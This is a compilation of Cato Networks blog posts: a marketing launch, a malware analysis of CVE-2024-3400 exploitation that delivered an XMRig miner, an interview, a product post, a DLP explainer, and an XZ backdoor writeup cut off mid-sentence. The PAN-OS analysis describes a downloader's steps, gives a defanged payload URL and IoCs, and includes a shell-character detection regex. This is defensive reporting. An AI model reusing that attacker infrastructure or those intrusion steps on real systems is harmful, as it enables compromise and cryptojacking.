Cato CTRL: A New Vision in Extended Threat Intelligence Reporting

Over the past twenty years, I have navigated a unique journey through the cybersecurity landscape. My path has taken me from the realms of hacking and academia into the heart of threat intelligence (TI), leading to my current role. Since I joined Cato in 2021, I’ve been leading security strategy and am proud to share the culmination of Cato’s research efforts in the Cyber Threats Research Lab (Cato CTRL), our cyber threat research team.

My career has been a natural progression from my curiosity as a child – fascinated by the inner workings of the technology that powered the world around me. That curiosity drew me into the world of hacking. The hacker mindset became not just a tool but a lens through which I viewed the digital world. This perspective was invaluable, teaching me to think like an adversary and anticipate their moves. My transition to academia allowed me to share this knowledge with the next generation of cybersecurity professionals, shaping their understanding of cyber threats and defenses.

However, it was my tenure as chief security officer of a TI company that truly deepened my understanding of the challenges within TI. While there, I was confronted with the myriad problems plaguing TI efforts. The fragmentation of intelligence sources, the overwhelming volume of data, and the daunting task of sifting through false positives to find actionable insights were constant challenges. The consequences of these issues were significant, leading to delayed responses, missed threats, and an overall inefficiency in cybersecurity defenses.



















Joining Cato Networks marked a pivotal moment in my career. Cato is the first company that I know of to bring together networking and security in the cloud. With a massive data lake combining threat intelligence with the metadata of every flow traversing the Cato SASE Cloud Platform, Cato has unparalleled insight into the security and networking challenges facing enterprise networks.

[boxlink link="https://www.catonetworks.com/cato-ctrl/"] Cato CTRL – The SASE Cyber Threats Research Lab | Learn More[/boxlink]

Now with Cato CTRL, I can address these challenges head-on with the launch of Cato’s Extended Threat Intelligence services. With nearly 50 data scientists and threat researchers focusing on security alone and many more investigating network-related issues, we can couple the best of human intelligence with this incredible data resource that is Cato to provide unparalleled threat intelligence through deep network visibility and insight.

Our extended TI capabilities are a fusion of TI and granular network visibility analyzed by AI/ML algorithms and human intelligence. This innovative approach allows us to deliver comprehensive insights that were previously out of reach. Our first quarterly threat report, slated for release in May, is just the beginning. We aim to equip our customers and partners with the intelligence they need, and that only our SASE platform can provide, to navigate the complex cyber threat landscape effectively.

Our commitment extends beyond just gathering intelligence. We have dedicated ourselves to simplifying the integration and management of threat intelligence for SOCs, streamlining the process, and enabling more effective defense mechanisms. Our reports are designed to meet the strategic, operational, and tactical needs of our customers and partners, offering insights into global threats, industry-specific trends, and direct threats to individual organizations.

Ready for Whatever’s Next

As we look to the future, the Cato CTRL team is poised to play a pivotal role in shaping cybersecurity strategies, policies, and education. Our approach is to provide a more comprehensive understanding of cyber threats, moving away from piecemeal solutions to a more integrated cybersecurity posture.

This journey from hacker to professor to leading Cato Networks’ TI efforts has been challenging and rewarding. It is a path that has given me a deep appreciation for the complexities of cybersecurity and the ever-evolving nature of cyber threats. At Cato Networks, we are ready for whatever comes next, armed with knowledge, tools, and a team to make a significant impact in the fight against cyber threats.

# # #

About Cato CTRL

Cato CTRL (Cyber Threats Research Lab) is the world’s first CTI group to fuse threat intelligence with granular network insight made possible by Cato’s AI-enhanced, global SASE platform. By bringing together dozens of former military intelligence analysts, researchers, data scientists, academics, and industry-recognized security professionals, Cato CTRL combines the best in human intelligence with the best in network and security insight to shed light on the latest cyber threats and threat actors.



CVE-2024-3400: Critical Palo Alto PAN-OS Command Injection Vulnerability Exploited by Sysrv Botnet’s XMRig Malware

On Friday, April 12, 2024, Palo Alto Networks PAN-OS was found to have an OS command injection vulnerability (CVE-2024-3400). Due to its severity, CISA added it to its Known Exploited Vulnerabilities Catalog. Shortly after disclosure, a PoC was published.









We have identified several attempts to exploit this vulnerability with the intent to install XMRig malware for cryptocurrency mining. Cato’s sophisticated multi-layer detection and mitigation engines have successfully intercepted and blocked all such efforts. The recent vulnerability in PAN-OS underlines the inherently vulnerable architecture of on-premises firewalls. This situation highlights the critical need to transition from legacy appliances to a more integrated and holistic native Secure Access Service Edge (SASE) solution. Cato’s cloud-native SASE platform incorporates a complete security stack, seamlessly integrating various security functions. This dynamic and adaptive approach is designed to respond to evolving threats effectively, ensuring superior protection across the entire business infrastructure.

CVE-2024-3400 Palo Alto Networks GlobalProtect PAN-OS

On Friday, April 12, Palo Alto Networks published an advisory on the zero-day vulnerability CVE-2024-3400. The CVE carries a CVSS score of 10, the highest possible rating. It is found in multiple versions of PAN-OS, the operating system that powers Palo Alto’s firewall appliances.

This vulnerability allows unauthenticated threat actors to execute arbitrary code with root privileges on the firewall.

The vulnerability is in the “SESSID” cookie value, which creates a new file for every session as root. Given this behavior, it’s possible to execute code using bash manipulations. For a detailed vulnerability analysis, visit the AttackerKB blog.
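As a rough illustration of why this cookie makes a useful detection point, the sketch below flags SESSID values that contain path or shell characters. The character list, the function names, and the sample values are assumptions made for illustration. This is not Cato's detection logic, and a real signature would need tuning against legitimate traffic.

```python
import re
from typing import Optional

# Assumed heuristic: a session identifier has no reason to contain
# parent-directory hops, path separators, or shell metacharacters.
SUSPICIOUS = re.compile(r"\.\.|[/\\`$;|&(){}<>\s]")


def extract_cookie(cookie_header: str, name: str) -> Optional[str]:
    """Return the raw value of one cookie from a Cookie header, if present."""
    for part in cookie_header.split(";"):
        key, sep, value = part.strip().partition("=")
        if sep and key == name:
            return value
    return None


def is_suspicious_sessid(cookie_header: str) -> bool:
    """Flag a request whose SESSID value looks like a file path or shell input."""
    value = extract_cookie(cookie_header, "SESSID")
    return value is not None and bool(SUSPICIOUS.search(value))


if __name__ == "__main__":
    print(is_suspicious_sessid("SESSID=0123abcd-4567-89ef-0123-456789abcdef"))
    print(is_suspicious_sessid("SESSID=/../../tmp/x`id`"))
```

A check like this only covers the request side. It complements patching the appliance and does not replace it.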

Exploitation attempt

By analyzing the exploit, we can better understand what the threat actors were trying to achieve.

Malware downloader analysis – ldr.sh

The threat actors exploited the vulnerability to download a bash script named "ldr.sh" to the firewall machine. If the exploitation were successful, the script's commands would then run with root privileges and aim to disable and remove any security services and malware present on the infected system.

The threat actor would then download and run the XMRig malware from hxxp[://]92[.]60[.]39[.]76:9991/cron

The downloader downloads the cron malware into Path and then executes it

After that, the threat actor tried to spread the malware to different hosts that the victim had access to, by searching for an SSH configuration. They would then connect to the machine and download the malware.

After infecting the current machine and spreading to other hosts, the threat actor would cover their tracks by deleting logs.

Payload analysis – XMRig malware

After obtaining the malware sample, we started a basic analysis. The malware is written in Golang and has different variations for Linux and Windows operating systems.

An investigation of the IP address reveals that it is associated with a known Sysrv Botnet.

Analyzing the malware using Ghidra, we found strings associated with XMRig.

We also ran the malware in a controlled environment and saw it periodically sends DNS requests to www[.]dblikes[.]top. If the malware cannot reach the website, it will not trigger the miner.

Running the malware generated requests to www[.]dblikes[.]top

The malware’s connection to www[.]dblikes[.]top and the Sysrv botnet, as shown in VirusTotal

Following our primary analysis, we concluded that it is the XMRig malware.

However, in addition to the payload for malware deployment, we also saw multiple attempts to probe for the vulnerability by sending out-of-band HTTP and DNS requests.



True SASE to the rescue



Legacy security products relying on physical appliances are inherently vulnerable due to the limitations of their architecture. As cybersecurity threats evolve, these vulnerabilities can expose organizations to significant risks. A robust cloud-based Secure Access Service Edge (SASE) solution is crucial for the future of information security. A true SASE solution, updated continuously, is less susceptible to the vulnerabilities that plague traditional appliance-based products. Unlike these legacy systems, which can serve as initial access points for threat actors, a cloud-native SASE architecture is designed for resilience and is enhanced daily to combat new and emerging threats. This continuous improvement ensures a more secure and adaptive security environment.

Virtual patching vs. manual patching

Threat actors are quick to exploit vulnerabilities to disseminate malware. To address this, Palo Alto customers must apply the PAN-OS patch to every Palo Alto appliance, which is a significant drawback compared to virtual patching solutions. Products offering virtual patching, multi-layer detection, and mitigation, like SASE, offer rapid protection, representing a more agile and effective defense against emerging security threats. This advantage is crucial in environments where the speed of response impacts the ability to mitigate or prevent security breaches.

Cato Networks provides comprehensive protection for organizations, not only at the initial access point but throughout all stages of the kill chain. This includes defenses against lateral movement, malware deployments and DNS-based threats. By securing each kill chain phase, Cato ensures a robust defense mechanism that minimizes vulnerabilities and enhances overall security posture. This approach helps prevent attackers from advancing their objectives at any point, safeguarding critical assets and data against a wide spectrum of cyber threats.

We will provide further updates when we detect any new attempts to exploit.

IoC list

IPs

189[.]206[.]227[.]150

92[.]60[.]39[.]76:9991

92[.]60[.]39[.]76:9993

Domains

www[.]dblikes[.]top

Hashes

· Cron (UPX) - 1BC022583336DABEB5878BFE97FD440DE6B8816B2158618B2D3D7586ADD12502

· Cron (Unpacked) - 36F2CB3833907B7C19C8B5284A5730BCD6A7917358C9A9DF633249C702CF9283

· ldr.sh - 5CA95BC554B83354D0581CDFA1D983C0EFFF33053DEFBC7E0359B68605FAB781

· wr.exe (UPX) - A742C71CE1AE3316E82D2B8C788B9C6FFD723D8D6DA4F94BA5639B84070BB639

· wr.exe (Unpacked) - 4D8C5FCCDABB9A175E58932562A60212D10F4D5A2BA22465C12EE5F59D1C4FE5
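The indicators above are written in defanged form, so they need to be restored before they can be matched against logs or files. The following is a minimal sketch of one way to do that. The helper names and the sample log lines are hypothetical, and the matching is deliberately simple.

```python
import hashlib
import re


def refang(indicator: str) -> str:
    """Undo the defanging conventions used in this post's IoC list."""
    return (indicator.replace("[.]", ".")
                     .replace("[://]", "://")
                     .replace("hxxp", "http"))


# Network indicators from the list above (ports omitted so any port matches).
NETWORK_IOCS = [refang(i) for i in (
    "189[.]206[.]227[.]150",
    "92[.]60[.]39[.]76",
    "www[.]dblikes[.]top",
)]

# SHA-256 hashes from the list above.
KNOWN_HASHES = {
    "1BC022583336DABEB5878BFE97FD440DE6B8816B2158618B2D3D7586ADD12502",
    "36F2CB3833907B7C19C8B5284A5730BCD6A7917358C9A9DF633249C702CF9283",
    "5CA95BC554B83354D0581CDFA1D983C0EFFF33053DEFBC7E0359B68605FAB781",
    "A742C71CE1AE3316E82D2B8C788B9C6FFD723D8D6DA4F94BA5639B84070BB639",
    "4D8C5FCCDABB9A175E58932562A60212D10F4D5A2BA22465C12EE5F59D1C4FE5",
}

# Boundary checks keep 92.60.39.76 from matching inside 192.60.39.76.
_PATTERNS = {
    ioc: re.compile(r"(?<![\w.-])" + re.escape(ioc) + r"(?![\w-])")
    for ioc in NETWORK_IOCS
}


def network_hits(log_line: str) -> list:
    """Return the network indicators that appear in a single log line."""
    return [ioc for ioc, pattern in _PATTERNS.items() if pattern.search(log_line)]


def matches_known_hash(data: bytes) -> bool:
    """Check whether the SHA-256 of a file's contents is in the hash list."""
    return hashlib.sha256(data).hexdigest().upper() in KNOWN_HASHES


if __name__ == "__main__":
    print(network_hits("GET " + refang("hxxp[://]92[.]60[.]39[.]76:9991/cron")))
```

Handle refanged indicators with care. They are live addresses again once the brackets are removed.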

MITRE techniques

· T1190 – Exploit Public-Facing Application

· T1059.003 – Windows Command Shell

· T1059.004 – Unix Shell

· T1562.001 – Disable or Modify Tools

· T1562.004 – Disable or Modify System Firewall

· T1070.002 – Clear Linux or Mac System Logs

· T1070.004 – File Deletion

· T1552.004 – Private Keys

· T1021.004 – SSH

· T1105 – Ingress Tool Transfer

· T1496 – Resource Hijacking

The tactics, techniques, and sub-techniques in the MITRE ATT&CK Navigator

Women in Tech: A Conversation with Cato’s Shay Rubio

For International Women’s Day (March 8, 2024), the German-language software news site entwickler.de interviewed Cato product manager Shay Rubio about her journey in high tech. Here’s an English translation of that interview:

When did you become interested in technology and what first got you interested in tech?

I’m a curious person by nature and I was always intrigued by understanding how things work. I think my interest in technology was sparked during my military service in an intelligence unit, which revolved around understanding cyber threats and cyber security.

How did your career path lead you to your current position?

I am a product manager for Cato Networks, working on cybersecurity products like our Cato XDR, which we just announced in January. My interest in the cybersecurity space led me to search for a position in a top company in this field, but I still wanted a place that moves at the pace of a startup. Cato was the perfect blend of both.

Were there people who supported you, or did you have to overcome obstacles? Do you have a role model?

I was attending professional meetups searching for a mentor for some guidance in my career path. I approached a senior product manager and we clicked, and he’s been my mentor ever since, helping to guide me through obstacles. At Cato, we have some women in top tech positions and I take inspiration from them – they show me what’s possible and serve as role models for me and many other women in the industry.

What is your current job? (Company, position etc.) What does your typical workday look like?

Like I said, I am a product manager at Cato Networks, working on cybersecurity products like Cato XDR. As a PM, every day looks a bit different – and that’s what I love about it. In a typical day, I could be defining new features, collaborating with the engineering and research teams, taking customer calls showing them our new features, and collecting their feedback.

Did you start a project of your own or develop something?

I haven't started something of my own – yet. I have been very involved in Cato’s XDR. It almost feels like starting a project of my own.

Is there something you are proud of in your professional career?

I'm proud of driving collaboration within our team, encouraging everyone to speak their mind, and moving at the right pace. I think promoting diversity and inclusion within our team is key – each of us brings a unique perspective that eventually creates a better product. I have one example that comes to mind. During a brainstorming session, a team member shared her experience as a former customer support representative. Her insight into common user pain points helped us prioritize the right feature that directly addressed customer needs, resulting in higher user satisfaction and retention.

[boxlink link="https://www.catonetworks.com/resources/keep-your-it-staff-happy/"] Keep your IT Staff happy: How CIOs Can Turn the Burnout Tide in 6 Steps | Get Your eBook[/boxlink]

Is there a tech or IT topic you would like to know more about?

The cybersecurity landscape is changing so quickly – so you have to keep learning. I’m always happy to delve deeper into new threat actor techniques, threats, and mitigation strategies.

How do you relax after a hard day at work?

I love to spend some quality time with my partner, relaxing with a good TV show, or going out for drinks in one of the great cocktail bars we have in Tel Aviv. When I need to clear my head, I love weight training while blasting hip-hop music, and I also try to maintain my long-time hobby of singing.

Why aren't there more women in tech? What's your take on that?

I think it’s important to have women role models in senior positions in tech companies. We are what we see – and if someone like me has managed to make it, it will feel way more achievable for someone else to get there, too. In addition, in my opinion, we must have full equality in family life and in managing household tasks to get more women to pursue positions in tech.

If you could do another job for one week, what would it be?

I’ve always loved singing and music – and I try to incorporate it as a hobby in my day-to-day life, but we all know how it is – there’s never enough time for everything. I’d love to take a week and play around with music more, including learning the production side of music and creating my own tracks.

What kinds of stereotypes or clichés about women in tech have you heard? What kinds of problems arise from these perceptions?

Stereotypes about women's technical abilities or leadership skills persist, even after countless talented, hard-working women have disproven them. These stereotypes hinder our progress – and I mean not only women’s progress, but our society’s progress as a whole, since we’re missing out on amazing talent due to old, limiting beliefs. It's crucial to challenge these perceptions and advocate for change, for the benefit of us all.

Have the conditions for women in the IT and tech industry changed since you first started working there?

While the conditions for women in tech have improved, more work is needed to ensure equal opportunities and representation. More women leaders will help young women feel like they belong in this industry and that options are open for them so they can aim high and achieve their professional aspirations.

Do you have any tips for women who want to start in the tech industry? What should girls and women know about working in the tech industry?

My advice for women entering the tech industry is to cultivate a growth mindset, embracing challenges (and failures!) as opportunities for learning and growth. Hard work and perseverance are key in overcoming obstacles and achieving success, especially in demanding environments like tech companies and startups.

Additionally, seek out mentors to build a strong support network, and never underestimate the power of your unique perspective in driving innovation and progress in the tech industry.









The Cato Socket Gets LTE: The Answer for Instant Sites and Instant Backup

Every year, Bonnaroo, the popular music and arts festival, takes over a 700-acre farm in the southern U.S. for four days. While the festival is known for its diverse lineup of music, it also offers a unique and immersive festival experience filled with art, comedy, cinema, and more.

For the networking nerds among us, though, the festival might be even more attractive as a stress test of sorts. The festival is held in a temporary, rural location. There is no fixed internet connection to support the numerous vendors. And there’s no city WiFi to plug into. Still, that cute little booth selling the event’s hottest T-shirts needs to process customer transactions, manage inventory through the home office, and access cloud-based sales tools—all while ensuring data security and complying with industry regulations.







In short, the perfect problem for our newest Cato Socket – the X1600-LTE Socket. The Cato Socket has always worked with external LTE modems, but by integrating LTE into the Socket, there’s one less device to deploy and one less console to master. The LTE connection is fully managed within Cato, providing usage monitoring of the data plan and real-time monitoring of the LTE link quality, all within the same Cato Management Application as the rest of your infrastructure.

The new Cato X1600-LTE Socket includes two antennas and can operate at up to 150 Mbps upstream and 600 Mbps downstream.

LTE As the Secondary Access Link

Pop-up music and cultural festivals are hardly the only industries that will benefit from relying on the Cato X1600-LTE Socket. LTE is in high demand as a secondary link, particularly for geographically dispersed enterprises and enterprises relying on real-time data and communications.

Retail chains, for example, often have locations in areas of weak infrastructure but still require uninterrupted connectivity for critical operations like point-of-sale systems, inventory management, and secure communication. Logistics and transportation companies back in the headquarters need secondary access to ensure real-time communications with their trucks and fleet.

Cato SASE Cloud is particularly effective in carrying real-time communications. Our packet loss mitigation techniques, QoS, and the zero or near-zero packet loss on our backbone all make for a superior real-time experience. So, it’s no surprise that enterprises relying on real-time data and communication would be interested in the Cato X1600-LTE Socket.

[boxlink link="https://www.catonetworks.com/resources/socket-short-demo/"] Cato Demo: From Legacy to SASE in under 2 minutes with Cato sockets | Schedule a Demo[/boxlink]

Healthcare providers are looking at it for essential real-time data access for patient care, remote consultations, and medical device communication. Financial institutions require consistent connectivity to conduct secure transactions, data transfers, and communication. The Cato X1600-LTE Socket provides a backup connection as a safety net during primary network downtime, minimizing financial losses and reputational damage.

LTE As the Primary Access Link

Like booths at Bonnaroo, many enterprises can use LTE as a primary connection to Cato SASE Cloud where there’s no DIA infrastructure available. Rural businesses and communities in regions with limited or unreliable fixed internet options will find LTE helpful in providing a readily available and potentially faster connection for essential services like education, healthcare, and communication.

Construction sites and temporary locations also will benefit where setting up fixed internet infrastructure can be expensive and impractical. Emergency response teams also need LTE during natural disasters or emergencies where primary communication infrastructure might be compromised. First responders can use LTE to coordinate search and rescue operations and citizen communication.

The same goes for mobility situations. Field service companies where technicians require constant internet access for diagnostics, repairs, and remote support can benefit from Cato X1600-LTE Socket. Transportation and logistics companies with delivery drivers, fleet managers, and transportation hubs can leverage Cato X1600-LTE Socket for secure real-time tracking, delivery route optimization, and communication, ensuring efficient operations on the move.

LTE Connectivity Serves Cato’s Mission to Connect Remote and Mobile Users

The new LTE-enabled connectivity option fits perfectly into the overall Cato Networks strategy of simplifying and enhancing customers’ network security and performance—especially for geographically dispersed organizations or those requiring consistent connectivity on the go. Regardless of where or how customers connect to the Cato SASE Cloud, they get access to a converged cloud platform that merges critical network and security functions into a single, streamlined solution.

A "single pane of glass" management approach provides organizations with a comprehensive view of their entire IT infrastructure, eliminating the need to manage disparate tools and vendors. Cato further simplifies operations by consolidating network security, threat prevention, data protection, and AI-powered incident detection into one platform, reducing complexity and cost and saving valuable time and resources.

Cato provides detailed LTE-relevant statistics such as Reference Signal Received Power (RSRP), Reference Signal Received Quality (RSRQ), and Received Signal Strength Indicator (RSSI) in the new LTE analytics tab of the Cato Management Application.
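For readers less familiar with these three metrics, they are related by the standard LTE definition of RSRQ as N × RSRP / RSSI, where N is the number of resource blocks in the measurement bandwidth. The sketch below expresses that relationship in decibels. The function name and the sample readings are made up for illustration and do not come from the Cato Management Application, which reports the values directly.

```python
import math


def rsrq_db(rsrp_dbm: float, rssi_dbm: float, n_resource_blocks: int) -> float:
    """RSRQ in dB from RSRP and RSSI in dBm.

    In linear units RSRQ = N * RSRP / RSSI, so in decibels the product
    and quotient become a sum and a difference.
    """
    if n_resource_blocks <= 0:
        raise ValueError("n_resource_blocks must be positive")
    return 10 * math.log10(n_resource_blocks) + rsrp_dbm - rssi_dbm


if __name__ == "__main__":
    # Hypothetical reading on a 10 MHz carrier (50 resource blocks).
    print(round(rsrq_db(rsrp_dbm=-95.0, rssi_dbm=-65.0, n_resource_blocks=50), 2))
```

Because RSSI includes interference and noise as well as the serving cell's signal, a link can show a reasonable RSRP and still have a poor RSRQ, which is why it helps to see the metrics together.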

The LTE Socket is Now Available

The Cato X1600-LTE Socket is a mid-range SD-WAN device that enables optimized and secure enterprise WAN, Internet, and cloud connectivity. The Socket has fiber, copper, and LTE connectivity options. It has dual Micro SIM Standby (DSS), allowing for active standby in the event of failure of the cable connection. It supports up to 150 Mbps for upload, and up to 600 Mbps for download.

To learn more about the Cato Socket, visit https://www.catonetworks.com/cato-sase-cloud/cato-edge-sd-wan/.



How Cato Uses Large Language Models to Improve Data Loss Prevention

Cato Networks has recently released a new data loss prevention (DLP) capability, enabling customers to detect and block documents being transferred over the network, based on sensitive categories, such as tax forms, financial transactions, patent filings, medical records, job applications, and more. Many modern DLP solutions rely heavily on pattern-based matching to detect sensitive information. However, they don’t enable full control over sensitive data loss. Take, for example, a legal document such as an NDA. It may contain certain patterns that a legacy DLP engine could detect, but what likely concerns the company’s DLP policy is the actual contents of the document and any sensitive information contained in it.

Unfortunately, pattern-based methods fall short when trying to detect the document category. Many sensitive documents don’t have specific keywords or patterns that distinguish them from others, and therefore, require full-text analysis. In this case, the best approach is to apply data-driven methods and tools from the domain of natural language processing (NLP), specifically, large language models (LLM).

LLMs for Document Similarity

LLMs are artificial neural networks that were trained on massive amounts of text, commonly crawled from the web, to model natural language. In recent years, we’ve seen far-reaching advancements in their application to our modern-day lives and business use cases. These applications include language translation, chatbots (e.g. ChatGPT), text summarization, and more.

In the context of document classification, we can use a specialized LLM to analyze large amounts of text and create a compact numeric representation that captures semantic relationships and contextual information, formally known as text embeddings. An example of an LLM suited for text embeddings is Sentence-BERT. Sentence-BERT uses the well-known transformer-encoder architecture of BERT, and fine-tunes it to detect sentence similarity using a technique called contrastive learning.

In contrastive learning, the objective of the model is to learn an embedding for the text such that similar sentences are close together in the embedding space, while dissimilar sentences are far apart. This task can be achieved during the learning phase using triplet loss. In simpler terms, it involves sets of three samples:

An "anchor" (A) - a reference item

A "positive" (P) - a similar item to the anchor

A "negative" (N) - a dissimilar item.

The goal is to train a model to minimize the distance between the anchor and positive samples while maximizing the distance between the anchor and negative samples.

Contrastive Learning with triplet loss for sentence similarity.
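The triplet objective described above can be written down in a few lines. The following is a minimal sketch that assumes Euclidean distance and a margin of 1.0. Both are illustrative choices, as are the toy two-dimensional vectors, which stand in for real sentence embeddings.

```python
import math


def euclidean(u, v):
    """Euclidean distance between two equal-length vectors."""
    return math.sqrt(sum((a - b) ** 2 for a, b in zip(u, v)))


def triplet_loss(anchor, positive, negative, margin=1.0):
    """Zero once the negative is at least `margin` farther away than the positive."""
    return max(euclidean(anchor, positive) - euclidean(anchor, negative) + margin, 0.0)


if __name__ == "__main__":
    anchor, positive = [0.0, 0.0], [0.0, 1.0]
    # Negative already far from the anchor: nothing left to learn from this triplet.
    print(triplet_loss(anchor, positive, [3.0, 4.0]))
    # Negative almost as close as the positive: the loss is positive.
    print(triplet_loss(anchor, positive, [0.0, 1.5]))
```

During training, the loss is averaged over many triplets and minimized, which pulls positives toward their anchors and pushes negatives away.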

To illustrate the usage of Sentence-BERT for creating text embeddings, let’s take an example with three IRS tax forms: an empty W-9 form, a filled W-9 form, and an empty 1040 form. Feeding the LLM with the extracted and tokenized text of the documents produces three vectors of n numeric values each, where n is the embedding size, which depends on the LLM architecture. While each document contains unique and distinguishable text, their embeddings remain similar. More formally, the cosine similarity measured between each pair of embeddings is close to the maximum value.

Creating text embeddings from tax documents using Sentence-BERT.
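Cosine similarity itself is simple to compute once the embeddings exist. The sketch below uses short, made-up vectors in place of real Sentence-BERT output, which would have hundreds of dimensions. The variable names and values are purely illustrative.

```python
import math


def cosine_similarity(u, v):
    """Cosine of the angle between two vectors, in the range [-1, 1]."""
    dot = sum(a * b for a, b in zip(u, v))
    norm_u = math.sqrt(sum(a * a for a in u))
    norm_v = math.sqrt(sum(b * b for b in v))
    if norm_u == 0 or norm_v == 0:
        raise ValueError("cosine similarity is undefined for a zero vector")
    return dot / (norm_u * norm_v)


if __name__ == "__main__":
    # Hypothetical embeddings, not produced by any model.
    empty_w9 = [0.90, 0.10, 0.30]
    filled_w9 = [0.85, 0.15, 0.35]
    print(cosine_similarity(empty_w9, filled_w9))
```

The value depends only on the direction of the vectors, not their length, so two documents of very different sizes can still score as near-identical.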

Now that we have a numeric representation of each document and a similarity metric to compare them, we can proceed to classify them. To do that, we first require a set of several labeled documents per category, which we refer to as the “support set”. Then, for each new document sample, the class with the highest similarity from the support set will be inferred as the class label by our model.

There are several methods to measure the class with the highest similarity from a support set. In our case, we will apply a variation of the k-nearest neighbors algorithm that implements the classification based on the neighbors within a fixed radius.

In the illustration below, we see a new sample document, in the vector space given by the LLM’s text embedding. There are a total of 4 documents from the support set that are located in its neighborhood, defined by a radius R.

Formally, a text embedding y from the support set will be located in the neighborhood of a new sample document’s text embedding x , if

R ≥ 1 - similarity(x, y)

similarity being the cosine similarity function. Once all the neighbors are found, we can classify the new document based on the majority class.

Classifying a new document as a tax form based on the support set documents in its neighborhood.
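The radius-based neighbor vote can be sketched as follows. This is a simplified illustration of the idea rather than Cato's production classifier. The support set, the labels, the radius value, and the choice to return None when no neighbor is found are all assumptions.

```python
import math
from collections import Counter


def cosine_similarity(u, v):
    """Cosine of the angle between two non-zero vectors."""
    dot = sum(a * b for a, b in zip(u, v))
    return dot / (math.sqrt(sum(a * a for a in u)) * math.sqrt(sum(b * b for b in v)))


def classify(x, support_set, radius):
    """Majority label among support embeddings y with 1 - similarity(x, y) <= radius.

    Returns None when the neighborhood is empty. Ties go to the label
    encountered first in the support set.
    """
    neighbors = [label for y, label in support_set
                 if 1 - cosine_similarity(x, y) <= radius]
    if not neighbors:
        return None
    return Counter(neighbors).most_common(1)[0][0]


if __name__ == "__main__":
    # Toy 2-D "embeddings" with hypothetical labels.
    support = [([1.0, 0.0], "tax form"),
               ([0.9, 0.1], "tax form"),
               ([0.0, 1.0], "resume")]
    print(classify([1.0, 0.05], support, radius=0.1))
```

Leaving a document unclassified when nothing falls inside the radius is one way to limit false positives on documents that resemble none of the known categories.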

[boxlink link="https://www.catonetworks.com/resources/protect-your-sensitive-data-and-ensure-regulatory-compliance-with-catos-dlp/"] Protect Your Sensitive Data and Ensure Regulatory Compliance with Cato’s DLP | Get It Now [/boxlink]

Creating Advanced DLP Policies

Sensitive data is more than just personal information. ML solutions, specifically NLP and LLMs, can go beyond pattern-based matching, by analyzing large amounts of text to extract context and meaning. To create advanced data protection systems that are adaptable to the challenges of keeping all kinds of information safe, it’s crucial to incorporate this technology as well.

Cato’s newly released DLP enhancements, which leverage our ML model, include detection capabilities for a dozen different sensitive file categories, including financial, legal, HR, immigration, and medical documents. The new datatypes can be used alongside the previous custom regex and keyword-based datatypes to create advanced and powerful DLP policies, as in the example below.

A DLP rule to prevent internal job applicant resumes with contact details from being uploaded to 3rd party AI assistants.

While we've explored LLMs for text analysis, the realm of document understanding remains a dynamic area of ongoing research. Recent advancements have seen the integration of large vision models (LVM), which not only aid in analyzing text but also help understand the spatial layout of documents, offering promising avenues for enhancing DLP engines even further.

For further reading on DLP and how Cato customers can use the new features:

https://www.catonetworks.com/platform/data-loss-prevention-dlp/

https://support.catonetworks.com/hc/en-us/articles/5352915107869-Creating-DLP-Content-Profiles

XZ Backdoor / RCE (CVE-2024-3094) is the Biggest Supply Chain Attack Since Log4j

A severe backdoor has been discovered in XZ Utils versions 5.6.0 and 5.6.1, potentially allowing threat actors to remotely access systems using these versions within SSH implementations.

Many major Linux distributions were inadvertently distributing compromised versions. Consult your distribution's security advisory for specific impact information. While the attacker's identity and motivation remain unknown, the sophisticated and well-hidden nature of the code raises concerns about a state-sponsored attacker.

Cato does not use a vulnerable version of “XZ / liblzma” and Cato's code and infrastructure are not vulnerable to this backdoor / RCE.

Cato recommends that enterprises patch immediately. They should update XZ Utils from their Linux distribution's repositories as soon as possible. In addition, they should review all SSH configurations for potentially impacted systems, implement strict security measures (e.g., strong authentication and access controls) and actively monitor network traffic and system logs for anomalies, especially related to SSH activity on vulnerable systems. This situation is still developing. Monitor sources like your distribution's security advisories and trusted security news outlets for updates and enhanced detection methods.

What is XZ?

XZ Utils is a collection of free software tools used for highly efficient lossless data compression. It works with the .xz file format, known for its superior compression ratios compared to older formats like .gz or .bz2. The primary tools within XZ Utils (xz, unxz, xzcat, etc.) are used through your system's terminal or command prompt.

xz: Main command-line tool for compression and decompression.

liblzma: A library with programming interfaces (APIs) for use in development.

Many major Linux distributions (Debian, Ubuntu, Fedora, etc.) employ XZ to compress software packages within their repositories. This significantly reduces storage costs and speeds up users' downloads. The main Linux kernel source is distributed as an XZ-compressed tar archive. macOS also comes preinstalled with XZ.

It’s important to note that XZ is open source.

How was the Backdoor Discovered?

Andres Freund, a PostgreSQL developer and software engineer at Microsoft, discovered the backdoor on March 29, 2024. He observed some unusual behavior on Debian testing systems: logins via SSH were consuming abnormally high CPU resources, which slowed SSH performance, and he also encountered errors from valgrind (a memory debugging tool) related to liblzma (a core component of XZ Utils).

He posted his discovery to the oss-security mailing list hosted by Openwall. Openwall is a project aimed at enhancing computer security by providing a collection of open-source software, resources and information to improve system and network security.

This is a screenshot from the discussion that Andres Freund started on Openwall.

Delving into the source code, he discovered a very odd and out-of-place M4 macro. This macro appeared to be intentionally designed to introduce malicious code during the build process. The backdoor logic was heavily obfuscated to avoid easy detection.

What is Known About the Backdoor So Far?

The backdoor was committed on February 23, 2024 by “JiaT75”.

Even if you have a vulnerable version of “XZ” (liblzma), it does not necessarily mean that you are affected.

In the build code itself, multiple conditions must be met before the payload is triggered.

Here are a few examples:

This condition checks that the target build is for x86_64 and Linux systems. Otherwise, it terminates.

This condition checks that the build is being done with “gcc”. Otherwise, it terminates.
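From a defender's point of view, the two conditions described above can be restated as a simple predicate. The sketch below is not the attacker's build script, which performs more checks than these; it only models the two conditions named here, and the function name and parameters are hypothetical.

```python
import platform


def matches_reported_build_conditions(machine, system, compiler):
    """Return True when a build environment satisfies both conditions above.

    machine:  CPU architecture string, e.g. "x86_64"
    system:   operating system name, e.g. "Linux"
    compiler: name of the compiler used for the build, e.g. "gcc"
    """
    is_x86_64_linux = machine == "x86_64" and system == "Linux"
    uses_gcc = compiler == "gcc"
    return is_x86_64_linux and uses_gcc


# Describe the local machine; the compiler name is an assumed input here.
print(matches_reported_build_conditions(platform.machine(), platform.system(), "gcc"))
```

A False result only means these two conditions are not met. It says nothing about whether the installed package was built elsewhere on a matching system.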

From what we know so far, here are the steps in the malicious build process:

Checking various configuration settings and environment variables to ensure the build environment meets certain criteria (e.g., using GCC compiler, GNU linker, x86-64 architecture, etc.).

If the build environment is suitable, the script modifies the Makefiles and build configuration to enable the injection of the malicious code.

The script checks for specific source files related to CRC (cyclic redundancy check) algorithms used in XZ.

The script then attempts to inject a modified version of the CRC code into the XZ utility. It does this by:

